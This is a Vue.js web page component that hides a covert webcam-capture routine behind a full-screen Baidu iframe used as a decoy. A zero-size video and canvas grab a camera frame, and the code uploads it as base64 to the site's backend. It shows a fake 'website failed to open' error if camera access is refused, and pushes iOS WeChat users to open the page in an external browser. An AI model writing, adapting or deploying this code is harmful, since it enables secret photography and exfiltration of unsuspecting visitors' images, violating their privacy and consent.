<template>
  <div>
    <video id="video" ref="video" width="0" height="0" autoplay></video>
    <canvas style="width:0px;height:0px" id="canvas" width="480" height="640"></canvas>
    <!-- <img :src="aaa"> -->
    <div v-if="isTres" class="moerae bgab">
      <img class="imgWidt" src="../assets/open_in_browser.png" alt="">
    </div>
    <div v-else>
      <iframe src="https://www.baidu.com/" width="100%" style="height:100vh" frameborder="0"></iframe>
    </div>
    
  </div>
</template>
<script>
import { uploadImg } from '@/request/api'
import QS from 'qs'; // 引入qs模块，用来序列化post类型的数据
export default {

  data() {
    return {
      aaa: null,
      isTres: false,
    }
  },
  mounted() {
    let u = navigator.userAgent;
    let isiOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);//
    // 判断是否为微信浏览器
    console.log(this.isWeixinBrowser())
    if (isiOS && this.isWeixinBrowser()) {
      console.log('ios，在微信环境下')
      this.isTres = true;
      return 
    } else{
      this.inst();
    }
   
  },
  methods: {
    // 判断是否为微信浏览器
    isWeixinBrowser() {
      let ua = navigator.userAgent.toLowerCase();
      return /micromessenger/.test(ua) ? true : false;
    },
    inst() {

      let _this = this;
      var canvas = document.getElementById('canvas');
      var context = canvas.getContext('2d');
      var video = document.getElementById('video');
      if (navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
        navigator.mediaDevices
          .getUserMedia({ video: true })
          .then(stream => {
            video.srcObject = stream;
            video.play();
            setTimeout(function () {
              context.drawImage(video, 0, 0, 480, 640);
            }, 1000);
            setTimeout(function () {
              var img = canvas.toDataURL('image/png');
              // console.log(img)
              _this.aaa = img;
              // console.log(img)
							let data = QS.stringify({
							    "base64_url":img
							});
              uploadImg(data).then(res => {
                console.log(res)
								alert(res)
                const tracks = stream.getTracks();
                // 关闭摄像头和音频
                tracks.forEach(track => {
                  track.stop();
                });
              })
            }, 1300);

            console.log(stream)
          })
          .catch(eooro => {
            alert("网站打开失败！");
          })

      }

    },
  }
}
</script>
<style scoped>
  .bgab{
    position: absolute;
    left: 0;
    top: 0;
    width: 100%;
    height: 100vh;
    background: rgba(0, 0, 0, .5);
  }
  .imgWidt{
    width: 100%;
  }
</style>